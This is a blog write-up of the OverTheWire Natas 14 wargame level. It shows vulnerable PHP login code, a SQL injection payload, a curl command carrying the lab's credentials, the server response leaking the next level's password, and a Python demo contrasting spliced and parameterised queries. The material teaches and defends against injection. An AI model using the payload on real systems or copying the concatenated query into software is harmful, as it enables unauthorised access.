Monday 6 October 2014

Wargames - Natas 14


Recommended reading:
Using the credentials discovered in the previous challenge, head over to http://natas14.natas.labs.overthewire.org and take a look at its content.
This is a new kind of challenge: although it still involves code injection, this time we're working with SQL injection. These injections range from the simplest queries (like this challenge) to very complex ones.
If you take a look at the website, it's a simple login form. Let's look at the source code behind it:
 1 <html>
 2 <head>
 3 <!-- This stuff in the header has nothing to do with the level -->
 4 <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
 5 <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
 6 <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
 7 <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
 8 <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
 9 <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
10 <script>var wechallinfo = { "level": "natas14", "pass": "<censored>" };</script></head>
11 <body>
12 <h1>natas14</h1>
13 <div id="content">
14 <?
15 if(array_key_exists("username", $_REQUEST)) {
16     $link = mysql_connect('localhost', 'natas14', '<censored>');
17     mysql_select_db('natas14', $link);
18 
19     $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
20     if(array_key_exists("debug", $_GET)) {
21         echo "Executing query: $query<br>";
22     }
23 
24     if(mysql_num_rows(mysql_query($query, $link)) > 0) {
25             echo "Successful login! The password for natas15 is <censored><br>";
26     } else {
27             echo "Access denied!<br>";
28     }
29     mysql_close($link);
30 } else {
31 ?>
32 
33 <form action="index.php" method="POST">
34 Username: <input name="username"><br>
35 Password: <input name="password"><br>
36 <input type="submit" value="Login" />
37 </form>
38 <? } ?>
39 <div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
40 </div>
41 </body>
42 </html>
Not much to look at, simple logic. It checks for a username key in the request (either GET or POST, which is not good, but unrelated to this challenge), connects to the database, sends a query to check the username and password, and responds accordingly. A minor side note: if we provide a debug parameter in a GET request, it also prints the query that's executed. With this in mind, we can assume this is a SQL injection challenge. Now we just need to know how to exploit it. If you look at line 19, where the query is built, the values are taken directly from the request without any parsing or escaping; this is where we can take advantage. All we need to do is close the first quotes, write some SQL that always evaluates to TRUE (or in this case, that always returns something, since the code uses mysql_num_rows) and close the second quotes. Here's how it looks:
" OR "1"="1" "
Pretty simple. Now we just send this to the server, either using the form itself (we can put it in both the username and password fields), or go fancy and use curl:
curl http://natas14:Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1@natas14.natas.labs.overthewire.org/ --data "username=\" OR \"1\"=\"1\" \"&password=\" OR \"1\"=\"1\" \""
There are a lot of \" because the quotes have to be escaped for the shell, no big deal. This is what we get:
 1 <html>
 2 <head>
 3 <!-- This stuff in the header has nothing to do with the level -->
 4 <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
 5 <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
 6 <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
 7 <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
 8 <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
 9 <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
10 <script>var wechallinfo = { "level": "natas14", "pass": "Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1" };</script></head>
11 <body>
12 <h1>natas14</h1>
13 <div id="content">
14 Successful login! The password for natas15 is AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J<br><div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
15 </div>
16 </body>
17 </html>
And voilà, line 14 gives the password for natas15.

User natas15
Password AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J

This was a very simple SQL injection challenge. Check the recommended reading for an explanation of how it works, why it works, and how to prevent this type of exploitation.
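To show why line 19 is exploitable and what the fix looks like, here is an added Python example (not part of the original post and not the level's code) that runs the same login decision against an in-memory SQLite table with constructed data. The string-spliced query is shown beside a parameterised one, using a single-quote analogue of the payload above because SQLite treats double-quoted tokens as identifiers and, unlike MySQL, does not join adjacent string literals.

```python
import sqlite3

# Constructed stand-in for the natas14 users table (example data, not the level's).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('natas15', 'example-only-password')")
    return db

def build_query(username, password):
    # Same construction as line 19 of the level: request values spliced into SQL text.
    # Single quotes stand in for the level's double quotes (SQLite quoting rules differ).
    return (f"SELECT * FROM users WHERE username='{username}' "
            f"AND password='{password}'")

def login_vulnerable(db, username, password):
    query = build_query(username, password)
    print("Executing query:", query)          # what the level's ?debug output shows
    rows = db.execute(query).fetchall()
    return len(rows) > 0                       # same decision as mysql_num_rows(...) > 0

def login_safe(db, username, password):
    # Parameterised query: values travel separately from the SQL text, so quotes
    # inside them are data and can never change the statement's structure.
    rows = db.execute(
        "SELECT * FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchall()
    return len(rows) > 0

# Single-quote analogue of the level's payload  " OR "1"="1" "
PAYLOAD = "' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD, PAYLOAD))   # True
    print("safe:      ", login_safe(db, PAYLOAD, PAYLOAD))         # False
```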

Never Settle,
